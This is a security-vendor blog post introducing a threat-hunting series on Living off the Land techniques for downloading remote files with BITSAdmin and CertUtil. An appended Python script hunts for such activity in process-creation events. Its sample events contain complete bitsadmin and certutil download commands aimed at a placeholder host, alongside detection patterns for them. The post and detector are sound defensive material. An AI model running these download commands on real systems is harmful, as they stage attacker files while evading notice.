Cyborg Security is starting an exciting new series of threat hunting videos dedicated to the practice of Living off the Land (LotL)!
[Image: Living off the land meme]
Living off the Land (LotL) refers to threat actor behavior in which the attacker uses tools and resources that are already present in the compromised environment. Threat actors gain considerably from this approach. First, by using pre-installed tools, they reduce their likelihood of detection. Second, they minimize the operational need to bring additional tooling onto a target system. Lastly, because those toolsets are generic and widely used, relying on them helps confound attribution efforts.
These videos will focus on the common tactics, techniques, and procedures (TTPs) threat actors use to remain undetected in an environment. The video series will introduce the TTPs, explore how actors use them, and what organizations can do to detect this activity in their environment.
In the first part of this new series we take a look at living off the land techniques for downloading remote files on Microsoft Windows. A plethora of tools and binaries can be used to download remote files on Microsoft Windows. BITSAdmin and CertUtil come pre-installed on all Microsoft Windows systems and are among the tools threat actors most commonly use for this purpose. Check out the video below to learn more about these tools and how to hunt for them!
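As an added example (not part of the original post or of Cyborg Security's content), the following Python script shows the kind of hunting logic that surfaces BITSAdmin and CertUtil being used to fetch remote files: it scans process-creation events (Sysmon Event ID 1 or Security 4688 style fields) and flags invocations that combine a download-capable switch with a URL, while leaving legitimate local uses such as certificate verification or job listing alone. The event records, hostnames and paths are constructed for the example.

```python
import re

# Constructed sample process-creation events; field names mirror Sysmon EID 1 /
# Security 4688 but none of these records come from a real environment.
SAMPLE_EVENTS = [
    {"pid": 1001, "parent": "explorer.exe", "image": r"C:\Windows\System32\bitsadmin.exe",
     "cmdline": r"bitsadmin /transfer job1 /download /priority high http://files.example.invalid/a.bin C:\Users\Public\a.bin"},
    {"pid": 1002, "parent": "cmd.exe", "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": r"certutil -urlcache -split -f http://files.example.invalid/b.txt C:\Users\Public\b.txt"},
    {"pid": 1003, "parent": "services.exe", "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": r"certutil -verify C:\certs\corp.cer"},          # benign local use, no URL
    {"pid": 1004, "parent": "svchost.exe", "image": r"C:\Windows\System32\bitsadmin.exe",
     "cmdline": r"bitsadmin /list /allusers"},                    # benign job listing
]

# A remote resource reference anywhere on the command line.
URL_RE = re.compile(r"\b(?:https?|ftp)://\S+", re.IGNORECASE)

# Hunt rules: (rule name, image file name, switch pattern that implies a fetch).
# CertUtil accepts both '-' and '/' as switch prefixes, so the regex allows either.
HUNT_RULES = [
    ("bitsadmin_remote_download", "bitsadmin.exe", re.compile(r"/(transfer|addfile)\b", re.IGNORECASE)),
    ("certutil_remote_download", "certutil.exe", re.compile(r"[-/](urlcache|verifyctl)\b", re.IGNORECASE)),
]


def hunt(events):
    """Return one finding per event where bitsadmin/certutil is invoked with a
    download-capable switch AND a remote URL; benign local invocations are skipped."""
    findings = []
    for ev in events:
        binary = ev["image"].rsplit("\\", 1)[-1].lower()   # strip directory from image path
        cmd = ev["cmdline"]
        for name, rule_bin, switch_re in HUNT_RULES:
            if binary != rule_bin:
                continue
            url = URL_RE.search(cmd)
            if url and switch_re.search(cmd):
                findings.append({"rule": name, "pid": ev["pid"],
                                 "parent": ev["parent"], "url": url.group(0)})
    return findings


if __name__ == "__main__":
    for f in hunt(SAMPLE_EVENTS):
        print(f"[{f['rule']}] pid={f['pid']} parent={f['parent']} url={f['url']}")
```

In a real hunt the parent process and the URL destination are the first pivots: a download launched from an Office application or a script host, or pointing at an address outside the organization's known update sources, deserves a closer look than one spawned by a patch-management service.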